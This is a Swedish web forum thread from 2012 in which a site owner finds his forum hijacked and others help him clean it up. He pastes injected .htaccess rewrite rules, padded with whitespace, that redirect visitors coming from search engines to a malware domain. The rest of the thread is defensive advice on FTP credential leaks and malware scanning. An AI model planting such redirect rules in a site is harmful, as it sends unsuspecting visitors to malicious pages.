WN
Sidan 1 av 2 1 2
Visa 40 inlägg från det här ämnet på en sida

WN (https://www.wn.se/forum/index.php)
-   Allmänt (https://www.wn.se/forum/forumdisplay.php?f=2)
-   -   Elak kod någon stans som gömmer sig (https://www.wn.se/forum/showthread.php?t=1051873)

BarateaU 2012-01-18 23:51
Elak kod någon stans som gömmer sig
 
Kom hem från sol och bad och möttes av massa fina meddelanden om "hijack" på mitt forum.
Försöker hitta tänkar elak kod men ser ingen röd tråd.

Trycker jag på "nya inlägg"
http://www.mobilabredband.se/forum/s...on=show_recent

Så skickas man ibland hit:
hxxp:/ /onmouseout-divstyle.ru/vis/index.php?action=show_recent

Vilket är någon trevlig virussida.

Sneglar jag på koden så ser det ut som detta.
<a href="http://www.mobilabredband.se/forum/viewtopic.php?id=4016&amp;action=new" title="Gå till det första nya inlägget sen ditt senaste besök.">Nya inlägg</a>

Vad kan då detta betyda, att de har ändrat något i databas strukturen eller html koden?

BarateaU 2012-01-19 00:17
Hittade detta fina i min .htaccess fil bland annat


Kod:
<IfModule mod_rewrite.c>                                                                                                                                                                                                                                               

                                                                                                                                                                                                                                                RewriteEngine On                                                                                                                                                                                                                                               

                                                                                                                                                                                                                                                RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)                                                                                                                                                                                                                                               

                                                                                                                                                                                                                                                RewriteRule ^(.*)$ hxxp: / / onmouseout-divstyle.ru/vis/index.php [R=301,L]                                                                                                                                                                                                                                               

                                                                                                                                                                                                                                                RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)                                                                                                                                                                                                                                               

                                                                                                                                                                                                                                                RewriteRule ^(.*)$ hxxp: / /onmouseout-divstyle.ru/vis/index.php [R=301,L]                                                                                                                                                                                                                                               

                                                                                                                                                                                                                                                </IfModule>

foks 2012-01-19 07:51
Glöm inte att kolla hur .htaccessfilen ändrats. Notera tiden för när filen ändrades och jämför med accessloggarna. Hittar du ingenting där kan intrånget ha skett via FTP.

foks 2012-01-19 08:19
Update: Jag anar att du själv administrerar den här servern och det inte är ett webbhotellskont. Notera att även andra domäner på servern är drabbade, se http://sakrare.ikyon.se/?ip=188.95.227.20. Det är jag som driver den här sidan, attacken mot det här ip-numret upptäcktes i tisdags men på grund av lite krångel hos mig har de här rapporterna inte kommit iväg förrän nu.

b_andersson 2012-01-19 10:09
Installera och kör dessa för att kolla så du inte har ngt rootkit eller liknande som ligger kvar:

http://www.rootkit.nl/projects/rootkit_hunter.html
http://www.rfxn.com/projects/linux-malware-detect/

BarateaU 2012-01-19 11:32
Servern är citynetworks shared hosting

BarateaU 2012-01-19 11:43
Citat:
Ursprungligen postat av foks (Inlägg 20430308)
Glöm inte att kolla hur .htaccessfilen ändrats. Notera tiden för när filen ändrades och jämför med accessloggarna. Hittar du ingenting där kan intrånget ha skett via FTP.
Tyvärr har de bara access loggar från http och ej ftp.

Citat:
Ursprungligen postat av foks (Inlägg 20430310)
Update: Jag anar att du själv administrerar den här servern och det inte är ett webbhotellskont. Notera att även andra domäner på servern är drabbade, se http://sakrare.ikyon.se/?ip=188.95.227.20. Det är jag som driver den här sidan, attacken mot det här ip-numret upptäcktes i tisdags men på grund av lite krångel hos mig har de här rapporterna inte kommit iväg förrän nu.
Många av de sidorna är mina förutom 1, så kanske inte är kopplat till mig direkt utan nått med servern.

Citat:
Ursprungligen postat av b_andersson (Inlägg 20430318)
Installera och kör dessa för att kolla så du inte har ngt rootkit eller liknande som ligger kvar:

http://www.rootkit.nl/projects/rootkit_hunter.html
http://www.rfxn.com/projects/linux-malware-detect/
Måste ringa CN och höra vad som händer, efter jag fixade .htacessen igår så är den tillbaka till hijack idag.
Har bytt ftp konton nu också, får se om de hjälper lite.

gregoff 2012-01-19 12:14
Håll gärna tråden uppdaterad om vad som var orsaken när du/ni vet. Skulle vara intressant att veta vad man kanske inte tänker på själv.

Var med om något liknande tidigare på en tidigare arbetsplats. Där var problemet att ftp-lösen hade läckt ut från kunden själv.

AndreasS 2012-01-19 12:21
Det där har jag sett på flera kunders konton tidigare hos oss. Det som verkar ske är att FTP-lösenordet kommer ut (vanligen genom virus på datorn eller i samma nätverk som FTP-anslutningarna görs från). Sen brukar något kolla igenom kontot efter .htaccess-filer, ta ner dessa, lägga till redirects som kollar efter browser, vilken väg de kom in (referrer osv) och sen skicka vidare till antingen reklam eller virussidor.

Enda åtgärden vi har behövt göra i dessa fall är att meddela kunden, byta lösenord på FTP och be kunden köra en komplett virusscanning, det har löst alla ärenden jag kan minnas hittills.

BarateaU 2012-01-19 13:39
Har pratat med CN och de lät inte som jag var ensam om att ha anmält detta.
Men får se om det är knytet till mitt ftp konto enskilt eller vad det beror på.
Skall försöka rensa upp bäst jag kan nu


Alla tider är GMT +2. Klockan är nu 18:18.
Sidan 1 av 2 1 2
Visa 40 inlägg från det här ämnet på en sida

Programvara från: vBulletin® Version 3.8.2
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Svensk översättning av: Anders Pettersson